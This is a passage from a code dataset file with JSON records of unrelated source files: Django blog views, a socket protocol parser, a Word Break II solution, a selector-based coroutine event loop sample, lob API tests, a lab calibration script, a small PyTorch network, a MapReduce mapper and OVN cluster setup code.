Posts.objects.get(pk=id)\n deleted_post.delete()\n return redirect(post_list)\n\ndef delete_all_posts(request):\n all_posts = Posts.objects.all()\n all_posts.delete()\n return redirect(post_list)\n\ndef create_comment(request, id):\n post = get_object_or_404(Posts, pk=id)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save()\n comment.post = post\n comment.save()\n return redirect('post_list')\n else:\n form = CommentForm\n context = {\n 'form': form\n }\n return render(request, 'Comment/add_comment.html', context)","sub_path":"Week 7/Blog/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"328893436","text":"import socket\nimport struct\nimport pprint\n\nSERVER_FILENAME = \"server_storage.data\"\nSIZE_LINE_BYTE = 2 # Each bytearray is 2 bytes big.\nSIZE_DATA_DEFAULT = 256 # Default data size 2*(1 KB)\n\nSIZE_MSG_LENGTH = 2 # 2 byte of message size\nSIZE_MSG_TYPE = 1 # one byte message type\nSIZE_OFFSET = 8 # 64 bit offset\nSIZE_READ_SIZE = 2 # 2 byte of read size\n\n\nMAX_SEEK = 50000\n#LOOPBACK_ADDR = '127.0.0.1'\nLOOPBACK_ADDR = '10.254.0.7'\n# NUMBER_OF_SERVERS = 1\nMAX_NUMBER_OF_CLIENT = 1\nMAX_CLIENTS_TO_SERVE = 1\n\n\n\nSERVER_TCP_PORT = 20000 \nBACKEND_TCP_PORT = 25700 \n\nclass MsgType:\n READ_MSG = 1\n WRITE_MSG = 2\n READ_SUCCESS_ACK = 3\n WRITE_SUCCESS_ACK = 4\n ERROR = 5\n\nclass Message:\n def __init__( self, msgType, offset, readSize, buff ):\n self.type = msgType\n self.offset = offset\n self.readSize = readSize\n self.buffer = buff\n\n\nclass ParsingError( Exception ):\n pass\n\nclass 
ConnectionClosed( Exception ):\n    pass\n\ndef ParseRawMsg( rawMsg ):\n    # print( \"ParseRawMsg called with %d bytes\" % len (rawMsg) )\n    # pprint.pprint( \"ParseRawMsg called with: %s\" % rawMsg )\n    # pprint.pprint( \"ParseRawMsg called\" )\n    readSize = None\n    offset = None\n    buff = None\n\n    parseLocation = 0\n    msgType = struct.unpack( \"b\", rawMsg[ parseLocation : parseLocation + SIZE_MSG_TYPE ] )[ 0 ]\n    # pprint.pprint( \"msgType: %s ==> %d \" % ( rawMsg[ parseLocation : parseLocation + SIZE_MSG_TYPE ], msgType))\n    parseLocation += SIZE_MSG_TYPE\n\n    if msgType == MsgType.READ_MSG:\n        offset = struct.unpack( \"Q\", rawMsg[ parseLocation : parseLocation + SIZE_OFFSET ] )[ 0 ]\n        parseLocation += SIZE_OFFSET\n        readSize = struct.unpack( \"H\", rawMsg[ parseLocation : parseLocation + SIZE_READ_SIZE ] )[ 0 ]\n        parseLocation += SIZE_READ_SIZE\n        # pprint.pprint( \"ReadMsg(offset=%s, size=%s)\" % (offset, readSize))\n\n    elif msgType == MsgType.WRITE_MSG:\n        offset = struct.unpack( \"Q\", rawMsg[ parseLocation : parseLocation + SIZE_OFFSET ] )[ 0 ]\n        parseLocation += SIZE_OFFSET\n        buff = rawMsg[ parseLocation : ]\n        parseLocation += len( buff )\n        # pprint.pprint( \"WriteMsg(offset=%s, buffer size=%d, data[0:9] = %s)\" % (offset, len(buff), buff[0:9] ) )\n\n    elif msgType == MsgType.READ_SUCCESS_ACK:\n        buff = rawMsg[ parseLocation : ]\n        parseLocation += len( buff )\n        # pprint.pprint( \"ReadAck received. buff[0:9] = %s\" % (buff[0:9]))\n\n    elif msgType == MsgType.WRITE_SUCCESS_ACK:\n        # pprint.pprint( \"WriteAck\")\n        pass\n\n    else:\n        pprint.pprint( \"rawMsg: %s\" % rawMsg )\n        raise ParsingError( \"Unknown message type %d\" % msgType)\n\n    if parseLocation != len( rawMsg ):\n        raise ParsingError( \"Error calculating parseLocation\")\n\n\n    return Message( msgType, offset, readSize, buff )\n
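\n\n# Illustrative sketch (not part of the original module): framing a READ_MSG the\n# way ParseRawMsg() expects it: [1-byte type][8-byte offset][2-byte read size].\nif __name__ == \"__main__\":\n    raw = struct.pack( \"b\", MsgType.READ_MSG ) + struct.pack( \"Q\", 4096 ) + struct.pack( \"H\", 256 )\n    msg = ParseRawMsg( raw )\n    assert ( msg.type, msg.offset, msg.readSize ) == ( MsgType.READ_MSG, 4096, 256 )\n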
","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"337760858","text":"# Given a non-empty string s and a dictionary wordDict containing a list of non-empty words, add spaces in s to construct a sentence where each word is a valid dictionary word. Return all such possible sentences.\n#\n# Note:\n#\n# The same word in the dictionary may be reused multiple times in the segmentation.\n# You may assume the dictionary does not contain duplicate words.\n# Example 1:\n#\n# Input:\n# s = \"catsanddog\"\n# wordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\n# Output:\n# [\n#  \"cats and dog\",\n#  \"cat sand dog\"\n# ]\n# Example 2:\n#\n# Input:\n# s = \"pineapplepenapple\"\n# wordDict = [\"apple\", \"pen\", \"applepen\", \"pine\", \"pineapple\"]\n# Output:\n# [\n#  \"pine apple pen apple\",\n#  \"pineapple pen apple\",\n#  \"pine applepen apple\"\n# ]\n# Explanation: Note that you are allowed to reuse a dictionary word.\n# Example 3:\n#\n# Input:\n# s = \"catsandog\"\n# wordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\n# Output:\n# []\n#\n# Approach: unlike Word Break, which only asks whether a segmentation exists,\n# this problem asks for all segmentations, so we turn to DFS. Plain DFS alone\n# fails: the decision tree is huge and a full traversal is too slow for the\n# online judge. We prune with the dynamic-programming check from Word Break:\n# before recursing, test whether the remaining string is segmentable at all and\n# skip the branch if it is not. In effect, the solution is DP + DFS.\n\n\nclass Solution:\n    def wordBreak(self, s, wordDict):\n        \"\"\"\n        :type s: str\n        :type wordDict: List[str]\n        :rtype: List[str]\n        \"\"\"\n\n        def check(un_processed):\n            dp = [False for _ in range(len(un_processed) + 1)]\n            dp[0] = True\n            for i in range(1, len(un_processed) + 1):\n                for k in range(i):\n                    if dp[k] and un_processed[k:i] in wordDict:\n                        dp[i] = True\n            return dp[len(un_processed)]\n\n        def dfs(s, stringlist):\n            if check(s):\n                if len(s) == 0: self.result.append(stringlist[1:])\n                for i in range(1, len(s) + 1):\n                    if s[:i] in wordDict:\n                        dfs(s[i:], stringlist + ' ' + s[:i])\n\n        self.result = []\n        dfs(s, \"\")\n        return self.result","sub_path":"src/140_Word_Break_II.py","file_name":"140_Word_Break_II.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"441066783","text":"import socket\nimport asyncio  # stdlib; needed only by the reference TaskAsync class at the bottom\n\nfrom abc import ABCMeta, abstractmethod, abstractproperty  # for the SecRead reference class\nfrom collections import deque\nfrom selectors import DefaultSelector, EVENT_WRITE, EVENT_READ\n\nselector = DefaultSelector()\n\"\"\"\n    Essentially, the coroutines in this file are built from event-driven callbacks\n    (events registered with selectors) plus generators. The Queue, Task and Future\n    classes mirror the ideas behind their asyncio counterparts, and the raw socket\n    handling is also a good example for understanding how requests works.\n\"\"\"\n\n\nclass Future:\n    def __init__(self):\n        self.result = None\n        self._callbacks = []\n\n    def add_done_callback(self, fn):\n        self._callbacks.append(fn)\n\n    def set_result(self, result):\n        self.result = result\n        for callback in self._callbacks:\n            callback(self)\n
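\n\n# A minimal sketch (added for illustration): set_result() stores the value and\n# fires every callback registered via add_done_callback(), which is the whole\n# notification mechanism used below.\ndef _future_demo():\n    f = Future()\n    f.add_done_callback(lambda fut: print('Future resolved with', fut.result))\n    f.set_result(42)  # triggers the callback immediately\n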
\n\nclass AsyncRequest:\n    def __init__(self, host, url, port, timeout=5):\n        self.sock = socket.socket()\n        self.sock.settimeout(timeout)\n        self.sock.setblocking(False)\n        self.host = host\n        self.url = url\n        self.port = port\n        self.method = None\n\n    def get(self):\n        self.method = 'GET'\n        self.request = '{} {} HTTP/1.0\\r\\nHost: {}\\r\\n\\r\\n'.format(self.method, self.url, self.host) \n        return self\n\n    def read(self, sock):\n        f = Future()\n\n        def on_readable(conn, mask):\n            data = sock.recv(4096) \n            #conn.send(data) # Hope it won't block\n            f.set_result(data)\n\n        selector.register(sock.fileno(), EVENT_READ, on_readable)\n        chunk = yield f # Read one chunk.\n        selector.unregister(sock.fileno())\n        return chunk\n\n    def read_all(self, sock):\n        response = []\n        # Read whole response.\n        chunk = yield from self.read(sock)\n        while chunk:\n            response.append(chunk)\n            chunk = yield from self.read(sock)\n\n        return b''.join(response)\n\n    def on_connected(self, key, mask):\n        self.f.set_result(None)\n\n    def process(self):\n        if self.method is None:\n            self.get()\n        try:\n            self.sock.connect((self.host, self.port))\n        except BlockingIOError:\n            pass\n        self.f = Future()\n        selector.register(self.sock.fileno(),\n                          EVENT_WRITE,\n                          self.on_connected)\n        yield self.f\n        selector.unregister(self.sock.fileno())\n\n        self.sock.send(self.request.encode('ascii'))\n\n        chunk = yield from self.read_all(self.sock)\n        return chunk\n\n \nclass Task(Future):\n    def __init__(self, coro):\n        super().__init__()\n        self.coro = coro\n        f = Future()\n        f.set_result(None)\n        self.step(f)\n\n    def step(self, future):\n        try:\n            next_future = self.coro.send(future.result)\n            if next_future is None:\n                return\n        except StopIteration as exc:\n            self.set_result(exc.value)\n            return\n        next_future.add_done_callback(self.step)\n \nclass SelectTimeout(Exception):\n    \"\"\"Raised when the selector sees no events within select_timeout.\"\"\"\n    pass\n\nclass EventLoop:\n    stopped = False\n    select_timeout = 5\n\n    def run_until_complete(self, coros):\n        tasks = [Task(coro) for coro in coros]\n        try:\n            self.run_forever()\n        except Exception:\n            pass\n\n    def run_forever(self):\n        while not self.stopped:\n            events = selector.select(self.select_timeout)\n            if not events:\n                raise SelectTimeout('selector poll timed out')\n            for event_key, event_mask in events:\n                callback = event_key.data\n                callback(event_key, event_mask)\n\n    def close(self):\n        self.stopped = True\n\nloop = EventLoop()\ndef get_event_loop():\n    return loop\n\nclass Queue:\n    def __init__(self):\n        self._q = deque()\n        self.size = 0\n\n    def put(self, item):\n        self.size += 1\n        self._q.append(item)\n\n    def get(self):\n        item = self._q.popleft()\n        return item\n\n    def task_done(self):\n        self.size -= 1\n        if self.size == 0:\n            self.empty_callback()\n\nclass AsyncWorker(Queue):\n    def __init__(self, coroutine, workers=10, loop_timeout=5):\n        super().__init__()\n        self.func = coroutine\n        self.stopped = False\n        self.ev_loop = get_event_loop()\n        self.ev_loop.select_timeout = loop_timeout\n        self.workers = workers\n        self.result_callbacks = []\n\n    def work(self):\n        def _work():\n            while not self.stopped:\n                item = None\n                try:\n                    item = self.get()\n                except IndexError:\n                    yield None\n                result = yield from self.func(item)\n                self.task_done()\n                for callback in self.result_callbacks:\n                    callback(result)\n        self.tasks = []\n        for _ in range(self.workers):\n            self.tasks.append(_work())\n        self.ev_loop.run_until_complete(self.tasks)\n\n    def add_result_callback(self, func):\n        self.result_callbacks.append(func)\n\n    def empty_callback(self):\n        self.ev_loop.close()\n\ndef fetch(url):\n    request = AsyncRequest('www.baidu.com', url, 80)\n\n    data = yield from request.process()\n    return data\n\ndef get_page(url):\n    page = yield from fetch(url)\n    return page\n\ndef async_way():\n    ev_loop = get_event_loop()\n    ev_loop.run_until_complete([\n        get_page('/s?wd={}'.format(i)) for i in range(100)\n    ])\n\ndef print_content_length(data):\n    print(len(data))\n\nif __name__=='__main__':\n    \n    async_worker = AsyncWorker(get_page, workers=20)\n    async_worker.add_result_callback(print_content_length)\n    for i in range(15):\n        async_worker.put('/s?wd={}'.format(i))\n    async_worker.work()\n
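\n\n# A minimal sketch (added for illustration) of how Task drives a generator-based\n# coroutine: each yielded Future re-arms Task.step() as its done-callback until\n# the generator returns (StopIteration carries the return value).\ndef _task_demo():\n    fut = Future()\n\n    def coro():\n        value = yield fut\n        return value\n\n    t = Task(coro())         # runs until the coroutine yields fut\n    fut.set_result('hello')  # resolving fut resumes the coroutine\n    print(t.result)          # prints 'hello'\n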
\n\n# NOTE: the two classes below are kept as reference code from an asyncio/aiohttp\n# based variant. Their original base classes (one.Ext, log.datelog) and several\n# runtime dependencies (pd, xr, np, aiohttp, webio, coro, dateutil, LOGGER) are\n# not available in this file, so only the class statements were adjusted to keep\n# the module importable.\nclass TaskAsync:  # originally: class TaskAsync(one.Ext)\n    def __init__(self, taskprocfunc, resprocfunc, loop = None, workers=10):\n        super().__init__()\n\n        self.__taskqueue = []\n        self.processfunc = taskprocfunc\n        self.resprocfunc = resprocfunc\n        self.ev_loop = loop if loop else asyncio.get_event_loop()\n        self.workers = workers\n        self.result_callbacks = []\n\n    def addtask(self, item):\n        self.__taskqueue.append(item)\n\n    async def __run(self):\n        async def _produce(queue):\n            for item in self.__taskqueue:\n                job = await self.processfunc(item, self.ev_loop)\n                await queue.put(job)\n                for callback in self.result_callbacks:\n                    callback(job)\n        async def _consume(queue):\n            while True:\n                job = await queue.get()\n                res = self.resprocfunc(job)\n                queue.task_done() \n\n        queue = asyncio.Queue()\n\n        # create the consumer task list.\n        consumers = [asyncio.ensure_future(_consume(queue), loop = self.ev_loop) for _ in range(self.workers)]\n\n        # produce jobs, then wait for the queue to drain.\n        await _produce(queue)\n        await queue.join()\n        print('join')\n\n        # cancel consumer\n        for consumer in consumers:\n            consumer.cancel()\n\n    def go(self): \n        # run.\n        result = self.ev_loop.run_until_complete(self.__run())\n\n        # close loop\n        self.ev_loop.close()\n\n        return result\n\n    def add_result_callback(self, func):\n        self.result_callbacks.append(func)\n\n    def empty_callback(self):\n        self.ev_loop.close()\n\n\nclass SecRead(metaclass=ABCMeta):  # originally: class SecRead(log.datelog, metaclass=ABCMeta)\n    \"\"\"docstring for SecRead\"\"\"\n    def __init__(self, begin = None, end = None, doread = False, doparse = False):\n        super(SecRead, self).__init__(begin, end)\n\n        self._doread = doread\n        self._doparse = doparse\n\n        self._url = ''\n\n    @abstractproperty\n    def _datasourcepath(self):\n        pass\n\n    @abstractmethod\n    def _getdatafilepath(self, year):\n        pass\n\n    def __daterange(self, begin, end):\n        return pd.date_range(begin, end, freq='B')\n\n\n    @abstractmethod\n    def formatdate(self, date):\n        pass\n\n    def __queryurl(self, date):\n        return self._url % date\n\n    @abstractmethod\n    def _getheader(self):\n        pass\n\n    def _replace(self, cont, rep, val = np.nan):\n        cont[(cont == rep)] = val\n        return cont\n\n    @abstractmethod\n    def constructdataset(self, cont):\n        pass \n\n    @abstractmethod\n    def parsecontent(self, cont):\n        pass \n\n    async def __fetch(self, dayurl, loop):\n\n        if not dayurl:\n            return None\n\n        max_tries = 3\n        headers = self._getheader()\n        failedparsedates = []\n        \n        day = dayurl[0]\n        url = dayurl[1]\n\n        result = None\n\n        async with aiohttp.ClientSession(loop=self.loop) as session:\n            tries = 0\n            exception = None\n\n            response = None\n            while tries < max_tries:\n                try:\n                    response = await session.get(\n                        url, headers = headers, allow_redirects=False)\n\n                    # redirect\n                    if webio.is_redirect(response):\n                        location = response.headers['location']\n                        url = urllib.parse.urljoin(url, location)\n                        tries = 0\n                        continue\n\n                    break\n                except aiohttp.ClientConnectionError as conn_error:\n                    exception = conn_error\n                    print(conn_error)\n                    break # connection problem \n                except aiohttp.ClientError as client_error:\n                    print(client_error)\n                    LOGGER.info('try %r for %r raised %r', tries, url, client_error)\n                    exception = client_error\n\n                tries += 1\n\n            if response is None:\n                return day, None\n            # # connection error stop parse.\n            # if isinstance(exception, aiohttp.ClientConnectionError):\n            #     break\n            # else:\n            #     continue\n\n            try:\n                # response.read() is an asynchronous operation: it does not return\n                # the result immediately, it only returns an awaitable. Prefixing\n                # it with the await keyword, as below, is the fix:\n                body = await response.read()\n\n                if response.status == 200:\n                    result = body\n                elif response.status != 404:\n                    failedparsedates.append(day)\n                    print(day, ': ', response.status)\n                # else:\n                #     print(day, ': ', response.headers)\n                # Example:\n                # 2017-01-02 00:00:00 : \n            finally:\n                await response.release()\n\n        return day, result\n\n    def __parsedata(self, dayandcont):\n        \n        try: \n\n            day = dayandcont[0]\n            cont = dayandcont[1]\n\n            # init the data structure \n            # if not dataarr.size: \n            #     parsedata = self.constructdataset(cont) \n            \n            # parsecontent.\n            res, cont = self.parsecontent(cont)\n\n            print(cont)\n            if not res:\n                return None\n\n            return cont\n        except asyncio.CancelledError:\n            pass\n\n        return None\n    \n    def parsedataonline(self, data, duringdaterange):\n        self.loop = 
asyncio.get_event_loop()\n session = aiohttp.ClientSession(loop=self.loop)\n try:\n\n self.parsedata = xr.Dataset()\n self.parsedateseq = []\n self.parsedataarr = np.array([])\n\n async_worker = coro.TaskAsync(self.__fetch, self.__parsedata, workers=20, loop = self.loop)\n \n for day in duringdaterange: \n url = self.__queryurl(self.formatdate(day.date()))\n if not url:\n raise(ValueError('failed to get request url')) \n break\n \n async_worker.addtask((day, url))\n\n result = async_worker.go()\n # print(result)\n\n except Exception as err:\n print('Error happen while doing parsedataonline:', err)\n\n finally:\n #reporting.report(crawler)\n \n session.close()\n\n\n # replace null value with np.nan.\n return data\n\n def readdata(self, fromdate = None, todate = None, doparse = True, dsaveifparsed = True):\n \"\"\" read data and merge parsed data from line if needed.\n \"\"\"\n # correct date first.\n fromdate = self.getvaliddate(fromdate, True)\n todate = self.getvaliddate(todate, False)\n\n if todate > dateutil.today():\n todate = dateutil.today()\n \n data = xr.Dataset()\n\n if (todate < fromdate):\n raise(ValueError('fromdate is earlier than to date'\n 'readdata failed'))\n\n # data file is saved by year.\n #\n for year in range(fromdate.year, todate.year + 1):\n datafilepath = self._getdatafilepath(year)\n if os.path.isfile(datafilepath): \n datafromfile = xr.open_dataset(datafilepath, autoclose = True)\n if datafromfile:\n # if data: \n # data['reference_time'] = None\n\n data = xr.merge([data, datafromfile]) \n\n # data parse and merge\n # \n if not doparse: \n if data:\n data = data.sel(date = slice(fromdate, todate))\n return data\n\n if data:\n begin = data.indexes['date'][0] \n end = data.indexes['date'][-1]\n\n duringdate = None\n if pd.Timestamp(fromdate) < begin: \n duringdate = self.__daterange(fromdate, begin - datetime.timedelta(days = 1))\n \n if pd.Timestamp(todate) > end: \n datearr = self.__daterange(end + datetime.timedelta(days = 1), todate)\n if not duringdate is None:\n duringdate = duringdate.union(datearr)\n else:\n duringdate = datearr\n\n if not duringdate is None and not duringdate.empty:\n data = self.parsedataonline(data, duringdate) \n\n else: \n data = self.parsedataonline(data, self.__daterange(fromdate, todate)) \n\n if data: \n # save if parse new data. 
\n if doparse and dsaveifparsed:\n self.savedata(data)\n\n # slice data by the date period\n data = data.sel(date = slice(fromdate, todate))\n\n return data\n\n def savedata(self, data): \n if not os.path.exists(self._datasourcepath):\n os.makedirs(self._datasourcepath)\n\n if not data:\n return\n\n # save by year.\n for year in data.groupby('date.year').groups:\n datafilepath = self._getdatafilepath(year)\n\n yeardata = data.sel(date=str(year))\n if os.path.isfile(datafilepath): \n datafromfile = xr.open_dataset(datafilepath, autoclose = True)\n if datafromfile:\n file_begin = datafromfile.indexes['date'][0] \n file_end = datafromfile.indexes['date'][-1]\n\n begin = yeardata.indexes['date'][0]\n end = yeardata.indexes['date'][-1]\n\n if file_begin > begin or file_end < end:\n if file_begin < begin:\n yeardata = xr.merge([yeardata, datafromfile.sel(date = slice(file_begin, begin))]) \n if file_end > end: \n yeardata = xr.merge([yeardata, datafromfile.sel(date = slice(end, file_end))]) \n else:\n continue\n\n yeardata.to_netcdf(datafilepath)\n\n def readyeardata(self, year, periods = 0, doparse = True):\n \"\"\" read data and merge parsed data from line if needed.\n \"\"\" \n return self.readdata(datetime.date(year, 1, 1), datetime.date(year + periods, 12, 31), doparse = doparse)\n\n def readpastdata(self, years, doparse = True):\n day = dateutil.today()\n return self.readdata(datetime.date(day.year - years, day.month, day.day), day, doparse = doparse)\n\n def getdatacolumns(self, data):\n if data is None:\n return None\n\n return data.coords['columns']\n \n def getbydate(self, date, method = 'nearest'): \n if not date:\n return None\n\n if not self.isdatevalid(date):\n return None\n\n data = self.readyeardata(date.year)\n if not data:\n return None\n\n da = data.sel(date = date, method = method)\n if not da:\n return None\n\n return da\n\n def get(self, sec, col, doparse = True):\n data = self.readdata(doparse = doparse)\n if not data:\n return None\n\n indexes = {'Sector Code' : sec, 'columns' : col} \n return data.sel(**indexes , drop = True).data.to_dataframe()","sub_path":"base/co/asyncio_coro_sample.py","file_name":"asyncio_coro_sample.py","file_ext":"py","file_size_in_byte":17285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"18899426","text":"import unittest\nimport lob\nfrom lob.compat import BytesIO\n\n\nclass ObjectFunctions(unittest.TestCase):\n def setUp(self):\n lob.api_key = 'test_fc26575412e92e22a926bc96c857f375f8b'\n self.obj = lob.Object.list(limit=1).data[0]\n\n def test_list_objects(self):\n objects = lob.Object.list()\n self.assertTrue(isinstance(objects.data[0], lob.Object))\n self.assertEqual(objects.object, 'list')\n\n def test_list_objects_limit(self):\n objects = lob.Object.list(limit=2)\n self.assertTrue(isinstance(objects.data[0], lob.Object))\n self.assertEqual(len(objects.data), 2)\n\n def test_list_objects_fail(self):\n self.assertRaises(lob.error.InvalidRequestError, lob.Object.list, limit=1000)\n\n def test_create_object_remote(self):\n object = lob.Object.create(\n description = 'Test Object',\n file = 'https://lob.com/postcardfront.pdf',\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n self.assertEqual(object.description, 'Test Object')\n\n def test_create_object_stringio(self):\n object = lob.Object.create(\n description = 'Test Object BytesIO',\n file = BytesIO(open('tests/pc.pdf', 'rb').read()),\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n 
self.assertEqual(object.description, 'Test Object BytesIO')\n\n def test_create_object_local(self):\n object = lob.Object.create(\n description = 'Test Object Inline',\n file = open('tests/pc.pdf', 'rb'),\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n self.assertEqual(object.description, 'Test Object Inline')\n self.assertRaises(AttributeError, lambda: object.nonexistent_key)\n\n object.description = \"something new\"\n self.assertEqual(object.description, \"something new\")\n\n def test_create_directly_specify_files(self):\n object = lob.Object.create(\n description = 'Test Object Direct Specify',\n files = {'file': open('tests/pc.pdf', 'rb').read()},\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n self.assertEqual(object.description, 'Test Object Direct Specify')\n\n def test_create_object_fail(self):\n self.assertRaises(lob.error.InvalidRequestError, lob.Object.create)\n\n def test_retrieve_job(self):\n job = lob.Object.retrieve(id=lob.Object.list().data[0].id)\n self.assertTrue(isinstance(job, lob.Object))\n\n def test_retrieve_job_fail(self):\n self.assertRaises(lob.error.InvalidRequestError, lob.Object.retrieve, id='test')\n","sub_path":"tests/test_object.py","file_name":"test_object.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"26575607","text":"#!/usr/bin/env python\nimport numpy as np\nfrom scipy import stats\nimport sys\nsys.stdout = open('results.txt', 'w')\n\ndata = np.genfromtxt('sampleData.txt', delimiter=' ', skip_header=1, \\\n names=['sample', 'meanAbs', 'SD', 'abs1', 'abs2', 'abs3', 'abs4', 'abs5'])\n\n# calibration curve function\n# f(x) = 0.06274x + 0.001135\nabsorbance = []\nfor i in range (0, 7):\n absorbance.append(data['meanAbs'][i])\n\nHEBppm = []\nfor i in range (1, 4):\n HEBppm.append((absorbance[i] - 0.001135) / 0.06274)\n\nLiptonppm = []\nfor i in range (4, 7):\n Liptonppm.append((absorbance[i] - 0.001135) / 0.06274)\n\n\nprint ('[Cu] in HEB (ppm): \\t', np.mean(HEBppm))\nprint ('[Cu] in Lipton (ppm): \\t', np.mean(Liptonppm))\n\nHEBmg = []\nLiptonmg = []\nfor i in range (0, 3):\n HEBmg.append(HEBppm[i] * 0.025)\n Liptonmg.append(Liptonppm[i] * 0.025)\n\n# sample weights (g)\nHEBweight = [0.3759, 0.3722, 0.3445]\nLiptonweight = [0.4508, 0.3238, 0.3897]\n\nprint ()\n# results in mg of Cu/kg of tea\nHEBratio = []\nLiptonratio = []\n\nfor i in range (0, 3):\n HEBratio.append(HEBmg[i]/(HEBweight[i]/1000))\n Liptonratio.append(Liptonmg[i]/(Liptonweight[i]/1000))\n\nHEBmean = np.mean(HEBratio)\nLiptonmean = np.mean(Liptonratio)\n\nHEBstd = np.std(HEBratio)\nLiptonstd = np.std(Liptonratio)\n\nprint ('Results in Cu (mg) / kg tea')\nprint ('----------------------------')\nprint ('HEB mean: \\t', HEBmean)\nprint ('std: \\t\\t', HEBstd)\nprint ()\n\nprint ('Lipton mean: \\t', Liptonmean)\nprint ('std: \\t\\t', Liptonstd)\n\n","sub_path":"achem_2017/project/progressReport/data/calcData.py","file_name":"calcData.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"276731562","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/test/net.py\n# Compiled at: 2019-01-07 00:16:59\n# Size of source mod 2**32: 604 bytes\nimport torch.nn as nn, torch.nn.functional as F\n\nclass 
Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 20, 5, 1)\n self.conv2 = nn.Conv2d(20, 50, 5, 1)\n self.fc1 = nn.Linear(800, 500)\n self.fc2 = nn.Linear(500, 10)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv2(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(-1, 800)\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return F.log_softmax(x, dim=1)","sub_path":"pycfiles/karas-0.7.0-py3.6/net.cpython-36.py","file_name":"net.cpython-36.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"568575544","text":"__author__ = 'Ondrej Galbavy'\n\nimport sys\n\n# 3. job mapper - filter records\n# 1. and 2. job output\n# ->\n# type_id%used_by\\tobject_id\n# type_id%title\\tvalue\n\ndef parse_line(line):\n ckey, value = line.split(\"\\t\", 1)\n key, rel = ckey.split(\"%\", 1)\n return key.strip(), rel.strip(), value.strip()\n\nfor line in sys.stdin:\n key, rel, value = parse_line(line)\n\n if rel == 'used_by' or rel == 'title':\n print(line.strip())\n","sub_path":"python/src/mr_extractor_avro/job3mapper.py","file_name":"job3mapper.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"630588678","text":"import main\n\nclient = main.mongodb_conn_create()\nchannel = main.rabbitmq_conn_create()\nsteamid = \"76561198019267094\"\n\ntry:\n user_data = main.steam_get_user(steamid)\n main.rabbitmq_publish(channel, 'UserData', 'SteamUserData', user_data)\nfinally:\n main.mongodb_conn_close(client)\n main.rabbitmq_conn_close(channel)\n","sub_path":"Kickoff.py","file_name":"Kickoff.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"88371498","text":"import logging\nimport ovn_exceptions\nimport ovn_sandbox\nimport ovn_stats\nimport ovn_utils\nimport ovn_load_balancer as lb\nimport time\nimport netaddr\nfrom collections import namedtuple\nfrom collections import defaultdict\nfrom randmac import RandMac\nfrom datetime import datetime\n\nlog = logging.getLogger(__name__)\n\n\nClusterConfig = namedtuple(\n 'ClusterConfig',\n [\n 'monitor_all',\n 'logical_dp_groups',\n 'clustered_db',\n 'datapath_type',\n 'raft_election_to',\n 'northd_probe_interval',\n 'northd_threads',\n 'db_inactivity_probe',\n 'node_net',\n 'enable_ssl',\n 'node_remote',\n 'node_timeout_s',\n 'internal_net',\n 'external_net',\n 'gw_net',\n 'cluster_net',\n 'n_workers',\n 'n_relays',\n 'vips',\n 'vips6',\n 'vip_subnet',\n 'static_vips',\n 'static_vips6',\n 'use_ovsdb_etcd',\n 'ssl_private_key',\n 'ssl_cert',\n 'ssl_cacert',\n ],\n)\n\n\nBrExConfig = namedtuple('BrExConfig', ['physical_net'])\n\n\nclass Node(ovn_sandbox.Sandbox):\n def __init__(self, phys_node, container, mgmt_net, mgmt_ip):\n super(Node, self).__init__(phys_node, container)\n self.container = container\n self.mgmt_net = mgmt_net\n self.mgmt_ip = mgmt_ip\n\n\nclass CentralNode(Node):\n def __init__(\n self, phys_node, db_containers, relay_containers, mgmt_net, mgmt_ip\n ):\n super(CentralNode, self).__init__(\n phys_node, db_containers[0], mgmt_net, mgmt_ip\n )\n self.db_containers = db_containers\n self.relay_containers = relay_containers\n\n def start(self, cluster_cfg):\n log.info('Configuring central node')\n self.set_raft_election_timeout(cluster_cfg.raft_election_to)\n 
